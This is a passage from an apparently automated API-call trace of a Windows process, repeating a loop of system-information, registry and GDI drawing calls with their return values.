dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.737] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.737] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.737] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.737] BeginPath (hdc=0x0) returned 0 [0087.737] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.737] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.737] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.737] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.737] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.737] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.737] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.737] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.737] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa50401d0 [0087.737] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa70401cd [0087.737] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040abc [0087.737] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040abd [0087.738] CombineRgn (hrgnDst=0x1040abc, hrgnSrc1=0xa50401d0, hrgnSrc2=0xa70401cd, iMode=1) returned 1 [0087.738] CombineRgn (hrgnDst=0x1040abd, hrgnSrc1=0xa50401d0, hrgnSrc2=0xa70401cd, iMode=4) returned 2 [0087.738] CreateSolidBrush (color=0xff) returned 0x2100abb [0087.738] CreateSolidBrush (color=0xff0000) returned 0x1100abe [0087.738] DeleteObject (ho=0x1100abe) returned 1 [0087.738] DeleteObject (ho=0xa70401cd) returned 1 [0087.738] DeleteObject (ho=0xa50401d0) returned 1 [0087.738] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.738] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.738] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.738] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.738] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.738] BeginPath (hdc=0x0) returned 0 [0087.738] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.738] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.738] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.738] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.738] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.738] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.738] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.738] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.738] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa80401cd [0087.738] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa60401d0 [0087.738] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040abf [0087.738] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ac0 [0087.738] CombineRgn (hrgnDst=0x1040abf, hrgnSrc1=0xa80401cd, hrgnSrc2=0xa60401d0, iMode=1) returned 1 [0087.738] CombineRgn (hrgnDst=0x1040ac0, hrgnSrc1=0xa80401cd, hrgnSrc2=0xa60401d0, iMode=4) returned 2 [0087.738] CreateSolidBrush (color=0xff) returned 0x2100abe [0087.738] CreateSolidBrush (color=0xff0000) returned 0x1100ac1 [0087.738] DeleteObject (ho=0x1100ac1) returned 1 [0087.738] DeleteObject (ho=0xa60401d0) returned 1 [0087.738] DeleteObject (ho=0xa80401cd) returned 1 [0087.738] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.738] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.738] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.738] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.738] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.738] BeginPath (hdc=0x0) returned 0 [0087.738] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.738] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.738] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.738] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.738] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.738] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.739] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.739] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.739] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa70401d0 [0087.739] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa90401cd [0087.739] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ac2 [0087.739] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ac3 [0087.739] CombineRgn (hrgnDst=0x1040ac2, hrgnSrc1=0xa70401d0, hrgnSrc2=0xa90401cd, iMode=1) returned 1 [0087.739] CombineRgn (hrgnDst=0x1040ac3, hrgnSrc1=0xa70401d0, hrgnSrc2=0xa90401cd, iMode=4) returned 2 [0087.739] CreateSolidBrush (color=0xff) returned 0x2100ac1 [0087.739] CreateSolidBrush (color=0xff0000) returned 0x1100ac4 [0087.739] DeleteObject (ho=0x1100ac4) returned 1 [0087.739] DeleteObject (ho=0xa90401cd) returned 1 [0087.739] DeleteObject (ho=0xa70401d0) returned 1 [0087.739] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.739] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.739] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.739] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.739] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.739] BeginPath (hdc=0x0) returned 0 [0087.739] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.739] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.739] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.739] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.739] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.739] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.739] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.739] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.739] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xaa0401cd [0087.739] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa80401d0 [0087.739] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ac5 [0087.739] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ac6 [0087.739] CombineRgn (hrgnDst=0x1040ac5, hrgnSrc1=0xaa0401cd, hrgnSrc2=0xa80401d0, iMode=1) returned 1 [0087.739] CombineRgn (hrgnDst=0x1040ac6, hrgnSrc1=0xaa0401cd, hrgnSrc2=0xa80401d0, iMode=4) returned 2 [0087.739] CreateSolidBrush (color=0xff) returned 0x2100ac4 [0087.739] CreateSolidBrush (color=0xff0000) returned 0x1100ac7 [0087.739] DeleteObject (ho=0x1100ac7) returned 1 [0087.739] DeleteObject (ho=0xa80401d0) returned 1 [0087.740] DeleteObject (ho=0xaa0401cd) returned 1 [0087.740] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.740] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.740] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.740] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.740] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.740] BeginPath (hdc=0x0) returned 0 [0087.740] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.740] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.740] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.740] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.740] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.740] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.740] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.740] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.740] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa90401d0 [0087.740] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xab0401cd [0087.740] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ac8 [0087.740] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ac9 [0087.740] CombineRgn (hrgnDst=0x1040ac8, hrgnSrc1=0xa90401d0, hrgnSrc2=0xab0401cd, iMode=1) returned 1 [0087.740] CombineRgn (hrgnDst=0x1040ac9, hrgnSrc1=0xa90401d0, hrgnSrc2=0xab0401cd, iMode=4) returned 2 [0087.740] CreateSolidBrush (color=0xff) returned 0x2100ac7 [0087.740] CreateSolidBrush (color=0xff0000) returned 0x1100aca [0087.740] DeleteObject (ho=0x1100aca) returned 1 [0087.740] DeleteObject (ho=0xab0401cd) returned 1 [0087.740] DeleteObject (ho=0xa90401d0) returned 1 [0087.740] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.740] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.740] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.740] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.740] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.740] BeginPath (hdc=0x0) returned 0 [0087.740] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.740] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.740] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.740] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.740] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.740] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.740] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.740] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.741] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xac0401cd [0087.741] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xaa0401d0 [0087.741] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040acb [0087.741] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040acc [0087.741] CombineRgn (hrgnDst=0x1040acb, hrgnSrc1=0xac0401cd, hrgnSrc2=0xaa0401d0, iMode=1) returned 1 [0087.741] CombineRgn (hrgnDst=0x1040acc, hrgnSrc1=0xac0401cd, hrgnSrc2=0xaa0401d0, iMode=4) returned 2 [0087.741] CreateSolidBrush (color=0xff) returned 0x2100aca [0087.741] CreateSolidBrush (color=0xff0000) returned 0x1100acd [0087.741] DeleteObject (ho=0x1100acd) returned 1 [0087.741] DeleteObject (ho=0xaa0401d0) returned 1 [0087.741] DeleteObject (ho=0xac0401cd) returned 1 [0087.741] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.741] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.741] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.741] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.741] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.741] BeginPath (hdc=0x0) returned 0 [0087.741] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.741] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.741] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.741] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.741] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.741] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.741] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.741] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.741] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xab0401d0 [0087.741] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xad0401cd [0087.741] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ace [0087.741] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040acf [0087.741] CombineRgn (hrgnDst=0x1040ace, hrgnSrc1=0xab0401d0, hrgnSrc2=0xad0401cd, iMode=1) returned 1 [0087.741] CombineRgn (hrgnDst=0x1040acf, hrgnSrc1=0xab0401d0, hrgnSrc2=0xad0401cd, iMode=4) returned 2 [0087.741] CreateSolidBrush (color=0xff) returned 0x2100acd [0087.741] CreateSolidBrush (color=0xff0000) returned 0x1100ad0 [0087.741] DeleteObject (ho=0x1100ad0) returned 1 [0087.741] DeleteObject (ho=0xad0401cd) returned 1 [0087.741] DeleteObject (ho=0xab0401d0) returned 1 [0087.741] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.742] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.742] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.742] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.742] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.742] BeginPath (hdc=0x0) returned 0 [0087.742] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.742] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.742] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.742] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.742] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.742] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.742] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.742] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.742] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xae0401cd [0087.742] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xac0401d0 [0087.742] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ad1 [0087.742] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ad2 [0087.742] CombineRgn (hrgnDst=0x1040ad1, hrgnSrc1=0xae0401cd, hrgnSrc2=0xac0401d0, iMode=1) returned 1 [0087.742] CombineRgn (hrgnDst=0x1040ad2, hrgnSrc1=0xae0401cd, hrgnSrc2=0xac0401d0, iMode=4) returned 2 [0087.742] CreateSolidBrush (color=0xff) returned 0x2100ad0 [0087.742] CreateSolidBrush (color=0xff0000) returned 0x1100ad3 [0087.742] DeleteObject (ho=0x1100ad3) returned 1 [0087.742] DeleteObject (ho=0xac0401d0) returned 1 [0087.742] DeleteObject (ho=0xae0401cd) returned 1 [0087.742] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.742] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.742] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.742] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.742] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.742] BeginPath (hdc=0x0) returned 0 [0087.742] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.742] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.742] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.742] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.742] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.742] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.742] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.742] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.743] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xad0401d0 [0087.743] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xaf0401cd [0087.743] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ad4 [0087.743] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ad5 [0087.743] CombineRgn (hrgnDst=0x1040ad4, hrgnSrc1=0xad0401d0, hrgnSrc2=0xaf0401cd, iMode=1) returned 1 [0087.743] CombineRgn (hrgnDst=0x1040ad5, hrgnSrc1=0xad0401d0, hrgnSrc2=0xaf0401cd, iMode=4) returned 2 [0087.743] CreateSolidBrush (color=0xff) returned 0x2100ad3 [0087.743] CreateSolidBrush (color=0xff0000) returned 0x1100ad6 [0087.743] DeleteObject (ho=0x1100ad6) returned 1 [0087.743] DeleteObject (ho=0xaf0401cd) returned 1 [0087.743] DeleteObject (ho=0xad0401d0) returned 1 [0087.743] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.743] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.743] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.743] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.743] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.743] BeginPath (hdc=0x0) returned 0 [0087.743] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.743] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.743] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.743] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.743] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.743] GetWindowRect (in: 